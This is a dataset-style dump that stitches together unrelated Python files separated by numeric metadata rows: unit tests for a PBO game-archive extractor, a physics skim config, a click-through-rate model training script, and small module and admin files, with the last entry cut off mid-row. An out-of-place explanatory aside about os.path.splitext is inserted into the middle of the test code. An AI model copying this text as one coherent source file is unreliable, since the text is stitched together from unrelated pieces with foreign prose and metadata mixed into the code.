                self.mock_pboreader, [], verbose=False, deobfuscate=False, cfgconvert=None)
        mock_print.assert_not_called()
        self.mock_pboreader.files.assert_called_once_with()
        assert self.mock_makedirs.call_count == 3
        self.mock_makedirs.assert_has_calls([
            mock.call(os.path.join(b"dir1", b"dir2"), exist_ok=True),
            mock.call(os.path.join(b"dir1"), exist_ok=True),
            mock.call(os.path.join(b"dir1", b"dir2", b"dir3"), exist_ok=True)
        ])
        assert mock_open.call_count == 5
        mock_open.assert_has_calls([
            mock.call(os.path.join(b"dir1", b"dir2", b"filename.ext"), "w+b"),
            mock.call(os.path.join(b"dir1", b"filename.ext"), "w+b"),
            mock.call(os.path.join(b"dir1", b"dir2", b"dir3", b"filename.ext"), "w+b"),
            mock.call(os.path.join(b"filename.ext"), "w+b"),
            mock.call(os.path.join(b"other-filename.png"), "w+b")
        ], any_order=True)
        mock_open.return_value.__enter__.return_value.write.assert_has_calls([
            mock.call(b"1111"),
            mock.call(b"2222"),
            mock.call(b"3333"),
            mock.call(b"4444"),
            mock.call(b"5555")
        ])
    def test_extracts_specified_files_when_provided(self) -> None:
        mock_open = mock.mock_open()
        self.mock_pboreader.file.side_effect = [
            self.create_mock_file(b"filename.ext", b"4444"),
            self.create_mock_file(b"dir1\\filename.ext", b"2222")
        ]
        with mock.patch("builtins.print") as mock_print, mock.patch("builtins.open", mock_open):
            extract_pbo.extract_pbo(
                self.mock_pboreader,
                [
                    os.path.join("filename.ext"),
                    os.path.join("dir1", "filename.ext")
                ],
                verbose=False, deobfuscate=False, cfgconvert=None)
        mock_print.assert_not_called()
        assert self.mock_pboreader.file.call_count == 2
        self.mock_pboreader.file.assert_has_calls([
            mock.call(os.path.join("filename.ext")),
            mock.call(os.path.join("dir1", "filename.ext"))
        ])
        assert self.mock_makedirs.call_count == 1
        self.mock_makedirs.assert_called_once_with(b"dir1", exist_ok=True)
        assert mock_open.call_count == 2
        mock_open.assert_has_calls([
            mock.call(os.path.join(b"filename.ext"), "w+b"),
            mock.call(os.path.join(b"dir1", b"filename.ext"), "w+b")
        ], any_order=True)
        mock_open.return_value.__enter__.return_value.write.assert_has_calls([
            mock.call(b"4444"),
            mock.call(b"2222")
        ])
    def test_raises_if_specified_filename_does_not_exist(self) -> None:
        self.mock_pboreader.file.return_value = None
        with self.assertRaises(Exception):
            extract_pbo.extract_pbo(
                self.mock_pboreader,
                [
                    os.path.join("filename.ext"),
                    os.path.join("dir1", "filename.ext")
                ],
                verbose=False, deobfuscate=False, cfgconvert=None)
        self.mock_pboreader.file.assert_called_once()
        self.mock_makedirs.assert_not_called()
    def test_prints_filenames_as_they_are_extracted_when_verbose_is_true(self) -> None:
        mock_open = mock.mock_open()
        self.mock_pboreader.files.return_value = [
            self.create_mock_file(b"dir1\\dir2\\filename.ext", b"1111"),
            self.create_mock_file(b"dir1\\filename.ext", b"2222"),
            self.create_mock_file(b"dir1\\dir2\\dir3\\filename.ext", b"3333"),
            self.create_mock_file(b"filename.ext", b"4444"),
            self.create_mock_file(b"other-filename.png", b"5555")
        ]
        with mock.patch("builtins.print") as mock_print, mock.patch("builtins.open", mock_open):
            extract_pbo.extract_pbo(
                self.mock_pboreader, [], verbose=True, deobfuscate=False, cfgconvert=None)
        assert mock_print.call_count == 5
        mock_print.assert_has_calls([
            mock.call(f"Extracting {os.path.join('dir1', 'dir2', 'filename.ext')}"),
            mock.call(f"Extracting {os.path.join('dir1', 'filename.ext')}"),
            mock.call(f"Extracting {os.path.join('dir1', 'dir2', 'dir3', 'filename.ext')}"),
            mock.call("Extracting filename.ext"),
            mock.call("Extracting other-filename.png")
        ])
    def test_prints_specified_filenames_as_they_are_extracted_when_verbose_is_true(self) -> None:
        mock_open = mock.mock_open()
        self.mock_pboreader.file.side_effect = [
            self.create_mock_file(b"filename.ext", b"4444"),
            self.create_mock_file(b"dir1\\filename.ext", b"2222")
        ]
        with mock.patch("builtins.print") as mock_print, mock.patch("builtins.open", mock_open):
            extract_pbo.extract_pbo(
                self.mock_pboreader,
                [
                    os.path.join("filename.ext"),
                    os.path.join("dir1", "filename.ext")
                ],
                verbose=True, deobfuscate=False, cfgconvert=None)
        assert mock_print.call_count == 2
        mock_print.assert_has_calls([
            mock.call("Extracting filename.ext"),
            mock.call(f"Extracting {os.path.join('dir1', 'filename.ext')}")
        ])
    def test_deobfuscates_all_obfuscated_files_when_requested(self) -> None:
        mock_open = mock.mock_open()
        mock_files = [
            self.create_mock_file(b"obfuscated1", b"//***\r\n#include \"not-obfuscated1\"\r\n"),
            self.create_mock_file(
                b"obfuscated2",
                b"/*\r\n#pragma \"whatever\"\r\n*/\r\n#include \"not-obfuscated2\"\r\n"),
            self.create_mock_file(b"obfuscated3", b"#include \"not-obfuscated3\"\r\n"),
            self.create_mock_file(b"not-obfuscated1", b"NOT OBFUSCATED CONTENT 1"),
            self.create_mock_file(b"not-obfuscated2", b"NOT OBFUSCATED CONTENT 2"),
            self.create_mock_file(b"not-obfuscated3", b"NOT OBFUSCATED CONTENT 3")
        ]
        self.mock_pboreader.files.return_value = mock_files
        self.mock_pboreader.file.side_effect = mock_files[3:]
        with mock.patch("builtins.print") as mock_print, mock.patch("builtins.open", mock_open):
            extract_pbo.extract_pbo(
                self.mock_pboreader, [], verbose=False, deobfuscate=True, cfgconvert=None)
        mock_print.assert_not_called()
        assert mock_open.call_count == 3
        mock_open.assert_has_calls([
            mock.call(b"obfuscated1", "w+b"),
            mock.call(b"obfuscated2", "w+b"),
            mock.call(b"obfuscated3", "w+b")
        ], any_order=True)
        mock_open.return_value.__enter__.return_value.write.assert_has_calls([
            mock.call(b"NOT OBFUSCATED CONTENT 1"),
            mock.call(b"NOT OBFUSCATED CONTENT 2"),
            mock.call(b"NOT OBFUSCATED CONTENT 3")
        ])
        assert self.mock_pboreader.file.call_count == 3
        self.mock_pboreader.file.assert_has_calls([
            mock.call(b"not-obfuscated1"),
            mock.call(b"not-obfuscated2"),
            mock.call(b"not-obfuscated3")
        ])
    def test_deobfuscates_obfuscated_files_when_target_file_does_not_have_prefix(self) -> None:
        mock_open = mock.mock_open()
        self.mock_pboreader.files.return_value = [
            self.create_mock_file(b"obfuscated", b"#include \"not-obfuscated\"\r\n"),
        ]
        self.mock_pboreader.file.return_value = \
            self.create_mock_file(b"PREFIX\\not-obfuscated", b"NOT OBFUSCATED CONTENT")
        self.mock_pboreader.prefix.return_value = b"PREFIX"
        with mock.patch("builtins.open", mock_open):
            extract_pbo.extract_pbo(
                self.mock_pboreader, [], verbose=False, deobfuscate=True, cfgconvert=None)
        mock_open.return_value.__enter__.return_value.write.assert_called_once_with(
            b"NOT OBFUSCATED CONTENT")
        self.mock_pboreader.file.assert_called_once_with(b"PREFIX\\not-obfuscated")
    def test_prints_skipped_files_when_deobfuscating(self) -> None:
        mock_open = mock.mock_open()
        mock_files = [
            self.create_mock_file(b"obfuscated1", b"//***\r\n#include \"not-obfuscated1\"\r\n"),
            self.create_mock_file(
                b"obfuscated2",
                b"/*\r\n#pragma \"whatever\"\r\n*/\r\n#include \"not-obfuscated2\"\r\n"),
            self.create_mock_file(b"not-obfuscated1", b"NOT OBFUSCATED CONTENT 1"),
            self.create_mock_file(b"not-obfuscated2", b"NOT OBFUSCATED CONTENT 2")
        ]
        self.mock_pboreader.files.return_value = mock_files
        self.mock_pboreader.file.side_effect = [
            self.create_mock_file(b"not-obfuscated1", b"NOT OBFUSCATED CONTENT 1"),
            self.create_mock_file(b"not-obfuscated2", b"NOT OBFUSCATED CONTENT 2")
        ]
        with mock.patch("builtins.print") as mock_print, mock.patch("builtins.open", mock_open):
            extract_pbo.extract_pbo(
                self.mock_pboreader, [], verbose=True, deobfuscate=True, cfgconvert=None)
        assert mock_print.call_count == 4
        mock_print.assert_has_calls([
            mock.call("Extracting obfuscated1"),
            mock.call("Extracting obfuscated2"),
            mock.call("Skipping obfuscation file: not-obfuscated1"),
            mock.call("Skipping obfuscation file: not-obfuscated2")
        ])
    def test_extracts_files_as_is_if_unobfuscated_file_cannot_be_found(self) -> None:
        mock_open = mock.mock_open()
        content = b"//***\r\n#include \"not-obfuscated1\"\r\n"
        self.mock_pboreader.files.return_value = [
            self.create_mock_file(b"obfuscated1", content)
        ]
        self.mock_pboreader.file.return_value = None
        with mock.patch("builtins.print") as mock_print, mock.patch("builtins.open", mock_open):
            extract_pbo.extract_pbo(
                self.mock_pboreader, [], verbose=False, deobfuscate=True, cfgconvert=None)
        mock_print.assert_not_called()
        mock_open.assert_called_once_with(b"obfuscated1", "w+b")
        mock_open.return_value.__enter__.return_value.write.assert_called_once_with(content)
        self.mock_pboreader.file.assert_called_once_with(b"not-obfuscated1")
    def test_reports_missing_unobfuscated_file_when_verbose_enabled(self) -> None:
        mock_open = mock.mock_open()
        content = b"//***\r\n#include \"not-obfuscated1\"\r\n"
        self.mock_pboreader.files.return_value = [
            self.create_mock_file(b"obfuscated1", content)
        ]
        self.mock_pboreader.file.return_value = None
        with mock.patch("builtins.print") as mock_print, mock.patch("builtins.open", mock_open):
            extract_pbo.extract_pbo(
                self.mock_pboreader, [], verbose=True, deobfuscate=True, cfgconvert=None)
        mock_print.assert_has_calls([
            mock.call("Unable to deobfuscate obfuscated1")
        ])
        mock_open.assert_called_once_with(b"obfuscated1", "w+b")
        mock_open.return_value.__enter__.return_value.write.assert_called_once_with(content)
        self.mock_pboreader.file.assert_called_once_with(b"not-obfuscated1")
    def test_skips_invalid_obfuscation_files(self) -> None:
        mock_open = mock.mock_open()
        self.mock_pboreader.files.return_value = [
            self.create_mock_file(b"\t\t", b""),
            self.create_mock_file(b"*.*", b""),
            self.create_mock_file(b"obfuscated1", b"//***\r\n#include \"not-obfuscated1\"\r\n"),
            self.create_mock_file(b"file?to-skip", b""),
            self.create_mock_file(b"another-file-to*skip", b""),
            self.create_mock_file(b"yet-another-file\tto-skip", b""),
            self.create_mock_file(b"high-ascii-characters\xccare-also-skipped", b""),
        ]
        self.mock_pboreader.file.return_value = \
            self.create_mock_file(b"not-obfuscated1", b"NOT OBFUSCATED CONTENT 1")
        with mock.patch("builtins.print") as mock_print, mock.patch("builtins.open", mock_open):
            extract_pbo.extract_pbo(
                self.mock_pboreader, [], verbose=False, deobfuscate=True, cfgconvert=None)
        mock_print.assert_not_called()
        mock_open.assert_called_once_with(b"obfuscated1", "w+b")
        mock_open.return_value.__enter__.return_value.write.assert_called_once_with(
            b"NOT OBFUSCATED CONTENT 1")
        self.mock_pboreader.file.assert_called_once_with(b"not-obfuscated1")
    def test_does_not_convert_config_bin_files_when_cfgconvert_is_none(self) -> None:
        mock_open = mock.mock_open()
        self.mock_pboreader.files.return_value = [
            self.create_mock_file(b"dir1\\config.bin", b"1111")
        ]
        with mock.patch("builtins.print") as mock_print, mock.patch("builtins.open", mock_open):
            extract_pbo.extract_pbo(
                self.mock_pboreader, [], verbose=False, deobfuscate=False, cfgconvert=None)
        mock_print.assert_not_called()
        self.mock_bin_to_cpp.assert_not_called()
        mock_open.assert_called_once_with(os.path.join(b"dir1", b"config.bin"), "w+b")
        mock_open.return_value.__enter__.return_value.write.assert_called_once_with(b"1111")
    def test_converts_config_bin_files_when_cfgconvert_is_not_none(self) -> None:
        self.mock_bin_to_cpp.return_value = b"CPP-CONTENT"
        mock_open = mock.mock_open()
        self.mock_pboreader.files.return_value = [
            self.create_mock_file(b"dir1\\config.bin", b"1111")
        ]
        with mock.patch("builtins.print") as mock_print, mock.patch("builtins.open", mock_open):
            extract_pbo.extract_pbo(
                self.mock_pboreader, [], verbose=False, deobfuscate=False,
                cfgconvert="cppconvert.exe")
        mock_print.assert_not_called()
        self.mock_bin_to_cpp.assert_called_once_with(b"1111", "cppconvert.exe")
        mock_open.assert_called_once_with(os.path.join("dir1", "config.cpp"), "w+b")
        mock_open.return_value.__enter__.return_value.write.assert_called_once_with(b"CPP-CONTENT")
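The test above expects `dir1\config.bin` to be written out as `dir1/config.cpp` after conversion. Swapping the `.bin` extension for `.cpp` while keeping the directory part can be done with `os.path.splitext`, which also works on bytes paths (a standalone sketch; `cpp_name` is an illustrative helper, not the library's actual function):

```python
import os

def cpp_name(bin_path: bytes) -> bytes:
    # Replace the .bin extension with .cpp, keeping the directory part
    root, _ext = os.path.splitext(bin_path)
    return root + b".cpp"

assert cpp_name(os.path.join(b"dir1", b"config.bin")) == os.path.join(b"dir1", b"config.cpp")
```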
    def test_extracts_unconverted_config_bin_if_convert_to_config_cpp_fails(self) -> None:
        self.mock_bin_to_cpp.side_effect = Exception("cfgconvert error")
        mock_open = mock.mock_open()
        self.mock_pboreader.files.return_value = [
            self.create_mock_file(b"dir1\\config.bin", b"1111")
        ]
        with mock.patch("builtins.print") as mock_print, mock.patch("builtins.open", mock_open):
            extract_pbo.extract_pbo(
                self.mock_pboreader, [], verbose=False, deobfuscate=False,
                cfgconvert="cppconvert.exe")
        mock_print.assert_called_once_with(
            f"Failed to convert {os.path.join('dir1', 'config.bin')}: cfgconvert error")
        self.mock_bin_to_cpp.assert_called_once_with(b"1111", "cppconvert.exe")
        mock_open.assert_called_once_with(os.path.join(b"dir1", b"config.bin"), "w+b")
        mock_open.return_value.__enter__.return_value.write.assert_called_once_with(b"1111")
    def test_prints_when_converting_config_bin_files(self) -> None:
        self.mock_bin_to_cpp.return_value = b"CPP-CONTENT"
        mock_open = mock.mock_open()
        self.mock_pboreader.files.return_value = [
            self.create_mock_file(b"dir1\\config.bin", b"1111")
        ]
        with mock.patch("builtins.print") as mock_print, mock.patch("builtins.open", mock_open):
            extract_pbo.extract_pbo(
                self.mock_pboreader, [], verbose=True, deobfuscate=False,
                cfgconvert="cppconvert.exe")
        mock_print.assert_called_once_with(
            f"Converting {os.path.join('dir1', 'config.bin')}"
            f" -> {os.path.join('dir1', 'config.cpp')}")
| 43.492574 | 99 | 0.639235 | 2,303 | 17,571 | 4.593574 | 0.06904 | 0.048398 | 0.078741 | 0.071462 | 0.830324 | 0.809528 | 0.765668 | 0.730126 | 0.710086 | 0.691559 | 0 | 0.017248 | 0.231176 | 17,571 | 403 | 100 | 43.600496 | 0.76586 | 0 | 0 | 0.579937 | 0 | 0.003135 | 0.172159 | 0.022822 | 0 | 0 | 0 | 0 | 0.178683 | 1 | 0.056426 | false | 0 | 0.018809 | 0 | 0.081505 | 0.103448 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
1d63641a97a0d39f7674465f5c6c4c10dfa8fba4 | 254 | py | Python | DiffractiveForwardAnalysis/Configuration/python/DiffractiveForwardAnalysis_SkimPaths_cff.py | SWuchterl/cmssw | 769b4a7ef81796579af7d626da6039dfa0347b8e | [
"Apache-2.0"
] | 6 | 2017-09-08T14:12:56.000Z | 2022-03-09T23:57:01.000Z | DiffractiveForwardAnalysis/Configuration/python/DiffractiveForwardAnalysis_SkimPaths_cff.py | SWuchterl/cmssw | 769b4a7ef81796579af7d626da6039dfa0347b8e | [
"Apache-2.0"
] | 545 | 2017-09-19T17:10:19.000Z | 2022-03-07T16:55:27.000Z | DiffractiveForwardAnalysis/Configuration/python/DiffractiveForwardAnalysis_SkimPaths_cff.py | SWuchterl/cmssw | 769b4a7ef81796579af7d626da6039dfa0347b8e | [
"Apache-2.0"
] | 14 | 2017-10-04T09:47:21.000Z | 2019-10-23T18:04:45.000Z | import FWCore.ParameterSet.Config as cms
# Diffraction and Forward Physics group Skim sequences
from DiffractiveForwardAnalysis.Skimming.gammagammaEE_SkimPaths_cff import *
from DiffractiveForwardAnalysis.Skimming.gammagammaMuMu_SkimPaths_cff import *
| 36.285714 | 78 | 0.877953 | 27 | 254 | 8.111111 | 0.740741 | 0.273973 | 0.347032 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.086614 | 254 | 6 | 79 | 42.333333 | 0.943966 | 0.204724 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
1d765a0a23df4c912483a6a007dc80ce6d105998 | 272 | py | Python | satef/evaluation/impl/RougeMetricFactory.py | kostrzmar/SATEF | b483b073f1ff3dd797413f212e26114ef93cfe08 | [
"MIT"
] | null | null | null | satef/evaluation/impl/RougeMetricFactory.py | kostrzmar/SATEF | b483b073f1ff3dd797413f212e26114ef93cfe08 | [
"MIT"
] | null | null | null | satef/evaluation/impl/RougeMetricFactory.py | kostrzmar/SATEF | b483b073f1ff3dd797413f212e26114ef93cfe08 | [
"MIT"
] | null | null | null | from evaluation import AbstractEvaluationFactory
from evaluation import AbstractEvaluation
from evaluation.impl import RougeMetric
class RougeMetricFactory(AbstractEvaluationFactory):
    def getEvaluationMetric(self) -> AbstractEvaluation:
        return RougeMetric() | 34 | 56 | 0.834559 | 22 | 272 | 10.318182 | 0.590909 | 0.185022 | 0.176211 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.125 | 272 | 8 | 57 | 34 | 0.953782 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.5 | 0.166667 | 1 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
1d7e61370359f481d661af27fdb358747be7cca1 | 6,116 | py | Python | ctrNet-tool/train.py | misads/ctr | cb94f06ae7a7c8df52d0dfa95104cfff67172e64 | [
"MIT"
] | 1 | 2019-12-23T05:13:28.000Z | 2019-12-23T05:13:28.000Z | ctrNet-tool/train.py | misads/ctr | cb94f06ae7a7c8df52d0dfa95104cfff67172e64 | [
"MIT"
] | null | null | null | ctrNet-tool/train.py | misads/ctr | cb94f06ae7a7c8df52d0dfa95104cfff67172e64 | [
"MIT"
] | null | null | null | import pandas as pd
import numpy as np
import tensorflow as tf
import ctrNet
from sklearn.model_selection import train_test_split
from src import misc_utils as utils
import os
features = 20
dev = 'data/merge_train_clean_random1000000.csv'
#train = 'data/merge_train_clean.csv'
#train = 'data/unique_uid_merge_test_in_train_clean.csv'
#train = 'data/unique_uid_merge_test_in_train_clean_shuffle_1x.csv'
#train = 'data/merge_train_rm_robot_time_26_31_clean.csv'
train= 'data/600w_4500w.csv'
#train = 'data/m2.csv'
test = 'data/merge_test_clean.csv'
save_steps = 12787 # 38800
lr = 0.01 # 0.0002
k = 16
hashids = int(2e5) # 2e5
print('train dataset: ' + train)
print('val dataset: ' + dev)
train_df = pd.read_csv(train, header=None, sep=',')
train_df.columns = ['label'] + ['f' + str(i) for i in range(features)]
#train_df, dev_df,_,_ = train_test_split(train_df,train_df,test_size=0.1, random_state=2019)
#dev_df, test_df,_,_ = train_test_split(dev_df,dev_df,test_size=0.5, random_state=2019)
dev_df = pd.read_csv(dev, header=None, sep=',')
test_df = pd.read_csv(test, header=None, sep=',')
dev_df.columns = ['label'] + ['f' + str(i) for i in range(features)]
test_df.columns = ['label'] + ['f' + str(i) for i in range(features)]
features = ['f' + str(i) for i in range(features)]
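The list comprehensions above name the CSV columns `label, f0 … f19` and then rebind `features` to just the feature-column names. A quick check of the pattern in isolation:

```python
features = 20
cols = ['label'] + ['f' + str(i) for i in range(features)]
assert cols[:2] == ['label', 'f0']   # label first, then f0
assert cols[-1] == 'f19'             # last feature column
assert len(cols) == features + 1     # 20 features plus the label
```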
'''
#FM
hparam=tf.contrib.training.HParams(
model='fm', #['fm','ffm','nffm']
k=16,
hash_ids=int(1e5),
batch_size=64,
optimizer="adam", #['adadelta','adagrad','sgd','adam','ftrl','gd','padagrad','pgd','rmsprop']
learning_rate=0.0002,
num_display_steps=100,
num_eval_steps=1000,
steps=200,
epoch=2,
metric='auc', #['auc','logloss']
init_method='uniform', #['tnormal','uniform','normal','xavier_normal','xavier_uniform','he_normal','he_uniform']
init_value=0.1,
feature_nums=len(features))
utils.print_hparams(hparam)
os.environ["CUDA_DEVICE_ORDER"]='PCI_BUS_ID'
os.environ["CUDA_VISIBLE_DEVICES"]='7'
model=ctrNet.build_model(hparam)
print("Testing FM....")
model.train(train_data=(train_df[features],train_df['label']),\
dev_data=(dev_df[features],dev_df['label']))
from sklearn import metrics
preds=model.infer(dev_data=(test_df[features],test_df['label']))
fpr, tpr, thresholds = metrics.roc_curve(test_df['label']+1, preds, pos_label=2)
auc=metrics.auc(fpr, tpr)
print(auc)
print("FM Done....")
'''
'''
#FFM
hparam=tf.contrib.training.HParams(
model='ffm', #['fm','ffm','nffm']
k=16,
hash_ids=int(1e5),
batch_size=64,
optimizer="adam", #['adadelta','adagrad','sgd','adam','ftrl','gd','padagrad','pgd','rmsprop']
learning_rate=0.0002,
num_display_steps=100,
num_eval_steps=1000,
epoch=2,
metric='auc', #['auc','logloss']
init_method='uniform', #['tnormal','uniform','normal','xavier_normal','xavier_uniform','he_normal','he_uniform']
init_value=0.1,
feature_nums=len(features))
utils.print_hparams(hparam)
os.environ["CUDA_DEVICE_ORDER"]='PCI_BUS_ID'
os.environ["CUDA_VISIBLE_DEVICES"]='2,3'
model=ctrNet.build_model(hparam)
print("Testing FFM....")
model.train(train_data=(train_df[features],train_df['label']),\
dev_data=(dev_df[features],dev_df['label']))
from sklearn import metrics
preds=model.infer(dev_data=(test_df[features],test_df['label']))
fpr, tpr, thresholds = metrics.roc_curve(test_df['label']+1, preds, pos_label=2)
auc=metrics.auc(fpr, tpr)
print(auc)
print("FFM Done....")
'''
#NFFM
hparam = tf.contrib.training.HParams(
    model='nffm',
    norm=True,
    batch_norm_decay=0.9,
    hidden_size=[128, 128],
    cross_layer_sizes=[128, 128, 128],
    k=k,
    hash_ids=hashids,
    batch_size=4096,
    optimizer="adam",
    learning_rate=lr,
    num_display_steps=100,
    num_eval_steps=save_steps,
    metric='auc',
    epoch=1,
    activation=['relu', 'relu', 'relu'],
    cross_activation='identity',
    init_method='uniform',
    init_value=0.1,
    feature_nums=len(features))
utils.print_hparams(hparam)
#os.environ["CUDA_DEVICE_ORDER"]='PCI_BUS_ID'
#os.environ["CUDA_VISIBLE_DEVICES"]='2,3'
model=ctrNet.build_model(hparam)
print("Testing NFFM....")
model.train(train_data=(train_df[features], train_df['label']),
            dev_data=(dev_df[features], dev_df['label']),
            test_data=(test_df[features], test_df['label']))
from sklearn import metrics
preds=model.infer(dev_data=(test_df[features],test_df['label']))
fpr, tpr, thresholds = metrics.roc_curve(test_df['label'], preds, pos_label=1)
auc=metrics.auc(fpr, tpr)
print(auc)
print("NFFM Done....")
#Xdeepfm
'''
hparam=tf.contrib.training.HParams(
model='xdeepfm',
norm=True,
batch_norm_decay=0.9,
hidden_size=[128,128],
cross_layer_sizes=[128,128,128],
k=8,
hash_ids=int(2e5),
batch_size=4096,
optimizer="adam",
learning_rate=lr,
num_display_steps=100,
num_eval_steps=save_steps,
epoch=1,
metric='auc',
activation=['relu','relu','relu'],
cross_activation='identity',
init_method='uniform',
init_value=0.1,
feature_nums=len(features))
utils.print_hparams(hparam)
#os.environ["CUDA_DEVICE_ORDER"]='PCI_BUS_ID'
#os.environ["CUDA_VISIBLE_DEVICES"]='7'
model=ctrNet.build_model(hparam)
print("Testing XdeepFM....")
model.train(train_data=(train_df[features],train_df['label']),\
dev_data=(dev_df[features],dev_df['label']),\
test_data=(test_df[features],test_df['label']))
from sklearn import metrics
preds=model.infer(dev_data=(test_df[features],test_df['label']))
fpr, tpr, thresholds = metrics.roc_curve(test_df['label'], preds, pos_label=1)
auc=metrics.auc(fpr, tpr)
print(auc)
print("XdeepFM Done....")
'''
| 33.790055 | 124 | 0.641269 | 856 | 6,116 | 4.33528 | 0.185748 | 0.030719 | 0.029642 | 0.029103 | 0.806521 | 0.785233 | 0.747507 | 0.747507 | 0.74104 | 0.74104 | 0 | 0.034825 | 0.192446 | 6,116 | 180 | 125 | 33.977778 | 0.716542 | 0.085513 | 0 | 0 | 0 | 0 | 0.113636 | 0.032828 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.142857 | 0 | 0.142857 | 0.107143 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
1d944e8570a1abe035f3105f6401b9a7b2adfa33 | 117 | py | Python | iflai/ml/__init__.py | aliechoes/iflai | 74f20236a6fba4704fe3ab4cdde6fb64c6b1343e | [
"MIT"
] | null | null | null | iflai/ml/__init__.py | aliechoes/iflai | 74f20236a6fba4704fe3ab4cdde6fb64c6b1343e | [
"MIT"
] | null | null | null | iflai/ml/__init__.py | aliechoes/iflai | 74f20236a6fba4704fe3ab4cdde6fb64c6b1343e | [
"MIT"
] | null | null | null | from iflai.ml.FeatureExtractor import FeatureExtractor
from iflai.ml.AutoFeatureSelection import AutoFeatureSelection | 58.5 | 62 | 0.905983 | 12 | 117 | 8.833333 | 0.5 | 0.169811 | 0.207547 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.059829 | 117 | 2 | 62 | 58.5 | 0.963636 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
d52aeb6ead02834d36a61ad65d30f8798759627c | 98 | py | Python | trade_app/trade/__init__.py | Plazas87/trading_stocks_platform | c34de11152798720cefa552f4b713231508e23a8 | [
"MIT"
] | null | null | null | trade_app/trade/__init__.py | Plazas87/trading_stocks_platform | c34de11152798720cefa552f4b713231508e23a8 | [
"MIT"
] | null | null | null | trade_app/trade/__init__.py | Plazas87/trading_stocks_platform | c34de11152798720cefa552f4b713231508e23a8 | [
"MIT"
] | 2 | 2020-10-28T14:07:43.000Z | 2021-11-03T22:49:21.000Z | from .trade import Trade
from .trade_components import TradeComponents, TradeResults, TradeStatus
| 32.666667 | 72 | 0.857143 | 11 | 98 | 7.545455 | 0.636364 | 0.216867 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.102041 | 98 | 2 | 73 | 49 | 0.943182 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
d52afa843587323307ae06c2fe856a693b08539b | 197 | py | Python | servicebox/platforms/admin.py | FlxPeters/servicebox | 2fc39fa5ec6e629a0794fda003a7a0e4adf05202 | [
"Apache-2.0"
] | null | null | null | servicebox/platforms/admin.py | FlxPeters/servicebox | 2fc39fa5ec6e629a0794fda003a7a0e4adf05202 | [
"Apache-2.0"
] | null | null | null | servicebox/platforms/admin.py | FlxPeters/servicebox | 2fc39fa5ec6e629a0794fda003a7a0e4adf05202 | [
"Apache-2.0"
] | null | null | null | from django.contrib import admin
from mptt.admin import MPTTModelAdmin
from .models import Platform, PlatformGroup
admin.site.register(PlatformGroup, MPTTModelAdmin)
admin.site.register(Platform)
| 28.142857 | 50 | 0.847716 | 24 | 197 | 6.958333 | 0.5 | 0.107784 | 0.203593 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.086294 | 197 | 6 | 51 | 32.833333 | 0.927778 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.6 | 0 | 0.6 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
d52d2a413fd6b9b73e52b0ee4eb26f1f0cb97b07 | 43 | py | Python | tools/__init__.py | firestonelib/PASSL_1.0 | c1efd756dc6a22860ebdcf14d860e21f4ff78979 | [
"Apache-2.0"
] | null | null | null | tools/__init__.py | firestonelib/PASSL_1.0 | c1efd756dc6a22860ebdcf14d860e21f4ff78979 | [
"Apache-2.0"
] | null | null | null | tools/__init__.py | firestonelib/PASSL_1.0 | c1efd756dc6a22860ebdcf14d860e21f4ff78979 | [
"Apache-2.0"
